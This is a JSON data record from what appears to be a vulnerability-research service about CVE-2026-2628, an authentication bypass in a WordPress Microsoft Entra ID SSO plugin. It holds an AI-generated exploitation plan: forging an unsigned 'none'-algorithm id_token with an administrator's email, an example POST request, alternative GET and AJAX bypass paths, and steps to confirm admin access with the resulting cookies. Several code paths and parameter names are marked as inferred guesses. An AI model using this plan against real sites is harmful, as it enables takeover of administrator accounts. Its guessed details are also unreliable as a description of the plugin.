[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fLIGOrQjHE6JWMmygBy0JmDiGu-4Wbi2SSbhRgnlFcoA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":31},"CVE-2026-2628","all-in-one-microsoft-365-entra-id-azure-ad-sso-login-authentication-bypass","All-in-One Microsoft 365 & Entra ID \u002F Azure AD SSO Login \u003C= 2.2.5 - Authentication Bypass","The All-in-One Microsoft 365 & Entra ID \u002F Azure AD SSO Login plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.2.5. This makes it possible for unauthenticated attackers to bypass authentication and log in as other users, including administrators.","login-with-azure",null,"\u003C=2.2.5","2.2.6","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Authentication Bypass Using an Alternate Path or Channel","2026-03-02 13:04:58","2026-03-03 01:21:50",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5e15e36e-55f9-4095-a0ba-48ef9434606a?source=api-prod",1,[],"researched",false,3,"This research plan targets **CVE-2026-2628**, a critical authentication bypass in the \"All-in-One Microsoft 365 & Entra ID \u002F Azure AD SSO Login\" plugin (slug: `login-with-azure`). The vulnerability allows unauthenticated attackers to log in as any user, typically by exploiting flaws in the SSO callback logic where user identity is trusted without sufficient verification of the Microsoft Entra ID (Azure AD) response.\n\n### 1. Vulnerability Summary\nThe vulnerability exists in the plugin's handling of the OpenID Connect (OIDC) or SAML callback. The plugin registers a listener (usually on the `init` or `wp_loaded` hook) to process identity tokens (`id_token`) or authorization codes returned from Microsoft. In affected versions (\u003C= 2.2.5), the plugin fails to cryptographically verify the signature of the `id_token` or relies on an \"alternate path\" (such as a specific GET\u002FPOST parameter) that allows forcing a login for a specific email address without a valid external authentication session.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** The site root `index.php` (via `init` hook) or a specific AJAX handler.\n*   **Vulnerable Action\u002FParameter:** The plugin typically looks for `$_POST['id_token']` or a combination of `$_GET['option']` and `$_GET['email']`.\n*   **Authentication:** Unauthenticated (PR:N).\n*   **Preconditions:** The \"Single Sign-On\" must be enabled (often the default if the plugin is configured). The attacker needs the email address of a target administrator.\n\n### 3. Code Flow\n1.  **Entry Point:** The plugin registers a handler in the main plugin file or an includes file (e.g., `includes\u002Fclass-wpo-auth.php` or `all-in-one-microsoft-365-login.php`).\n    *   *Hook:* `add_action( 'init', [ $instance, 'check_for_sso_callback' ] );` (inferred)\n2.  **Logic:** The handler checks if the request contains SSO-related parameters.\n    *   Example: `if ( isset( $_POST['id_token'] ) ) { ... }`\n3.  **Vulnerable Path:** The code extracts the `upn` (User Principal Name) or `email` claim from the `id_token`.\n4.  **Verification Failure:** The plugin either:\n    *   Skips the `openssl_verify` \u002F JWT signature check.\n    *   Accepts a raw `email` parameter if a certain \"debug\" or \"test\" mode is inadvertently active.\n5.  **Sink:** The plugin calls `get_user_by( 'email', $email )` and then `wp_set_auth_cookie( $user->ID )`, effectively logging in the attacker.\n\n### 4. Nonce Acquisition Strategy\nSSO callback endpoints generally **do not require nonces** because they are designed to be hit by external identity providers (Microsoft) which cannot know a WordPress-generated nonce. \n\nIf the exploit requires an AJAX-based bypass (e.g., `wp_ajax_nopriv_mo_azure_sso`):\n1.  **Identify Script:** Look for `wp_localize_script` calls in the source using `grep -r \"wp_localize_script\" .`.\n2.  **Create Page:** `wp post create --post_type=page --post_status=publish --post_content='[wpo_sso_login]'` (Shortcode inferred from plugin documentation).\n3.  **Extract:** Navigate to the page and run `browser_eval(\"window.wpo_auth?.nonce\")`.\n\n*Note: For this specific Authentication Bypass, it is highly probable that no nonce is required.*\n\n### 5. Exploitation Strategy\nThe goal is to provide a forged `id_token` that the plugin will parse and trust.\n\n**Step 1: Obtain Target Email**\nIdentify the administrator's email using WP-CLI.\n```bash\nwp user list --role=administrator --fields=user_email --format=csv | tail -n 1\n```\n\n**Step 2: Construct the Payload**\nA JWT consists of `header.payload.signature`. If the plugin doesn't verify the signature, we can provide any signature.\n*   **Payload (Base64):** `{\"email\":\"admin@example.com\", \"upn\":\"admin@example.com\", \"nonce\":\"any\", \"aud\":\"any\"}`\n*   **Forged Token:** `eyJhbGciOiJub25lIn0.eyJl...\\K.any_signature`\n\n**Step 3: Execute the Bypass (HTTP Request)**\nUse the `http_request` tool to send the forged token to the callback listener.\n\n```javascript\n\u002F\u002F Example Exploit Request\nhttp_request({\n    method: \"POST\",\n    url: \"http:\u002F\u002Flocalhost:8080\u002F\",\n    headers: {\n        \"Content-Type\": \"application\u002Fx-www-form-urlencoded\"\n    },\n    body: \"id_token=eyJhbGciOiJub25lIn0.eyJl...\\K&state=any&option=mo_azure_sso_login\" \n    \u002F\u002F Note: The specific parameter names 'option' or 'action' should be verified via grep\n})\n```\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure `login-with-azure` version 2.2.5 is active.\n2.  **Configuration:** Configure the plugin with dummy Azure credentials (Client ID\u002FTenant ID) so the SSO listener is active.\n3.  **Target User:** Create an administrator if one doesn't exist: `wp user create victim admin@example.com --role=administrator --user_pass=password123`.\n\n### 7. Expected Results\n*   The HTTP response should return a `302 Redirect` to `\u002Fwp-admin\u002F`.\n*   The response headers MUST contain multiple `Set-Cookie` headers for `wordpress_logged_in_[hash]`.\n*   The body of the redirect page might contain \"Redirecting to Dashboard\".\n\n### 8. Verification Steps\nAfter performing the HTTP request:\n1.  **Check Auth State:** Run `wp eval \"var_dump(is_user_logged_in());\"` (This won't work across processes, so instead...)\n2.  **Verify via Cookie:** Use the `http_request` tool again, but this time pass the cookies received from the exploit response to `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002F`. If the response is `200 OK` and contains \"Dashboard\", the bypass is confirmed.\n3.  **Audit Logs:** Check if the plugin logged a successful login for the target email.\n\n### 9. Alternative Approaches\nIf the `id_token` POST method fails:\n*   **Alternative 1 (GET Param):** Try `\u002F?wpo_sso_callback=1&email=admin@example.com`.\n*   **Alternative 2 (AJAX):** Search for `wp_ajax_nopriv` handlers. If one exists named `mo_azure_login`, try sending the email via AJAX.\n*   **Grep Search for Identity Logic:**\n    ```bash\n    grep -r \"get_user_by\" . -A 5 | grep \"wp_set_auth_cookie\" -B 5\n    ```\n    This will reveal the exact variable names (e.g., `$_POST['user_email']`) used to fetch the user just before logging them in.","The All-in-One Microsoft 365 & Entra ID \u002F Azure AD SSO Login plugin is vulnerable to authentication bypass due to insufficient verification of identity tokens during the SSO callback. Unauthenticated attackers can exploit this by providing a forged id_token or utilizing an alternate path that allows forcing a login for a specific email address without a valid signature check.","1. Identify the email address of a target administrator.\n2. Construct an HTTP request (POST or GET) directed at the WordPress site's root or a specific listener that triggers the plugin's SSO callback logic (often on the 'init' hook).\n3. Provide a forged 'id_token' parameter containing a JWT payload with the target's email or UPN. Since the plugin fails to cryptographically verify the signature, the attacker can use a dummy signature or the 'none' algorithm.\n4. Alternatively, attempt to hit the callback using parameters like 'wpo_sso_callback' or 'email' if the plugin version supports an insecure alternate authentication path.\n5. Upon processing the request, the plugin locates the user by email and calls wp_set_auth_cookie(), allowing the attacker to gain full administrative access.","gemini-3-flash-preview","2026-04-18 21:14:14","2026-04-18 21:14:49",{"type":32,"vulnerable_version":33,"fixed_version":9,"vulnerable_browse":34,"vulnerable_zip":35,"fixed_browse":9,"fixed_zip":9,"all_tags":36},"plugin","2.2.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flogin-with-azure\u002Ftags\u002F2.2.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flogin-with-azure.2.2.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Flogin-with-azure\u002Ftags"]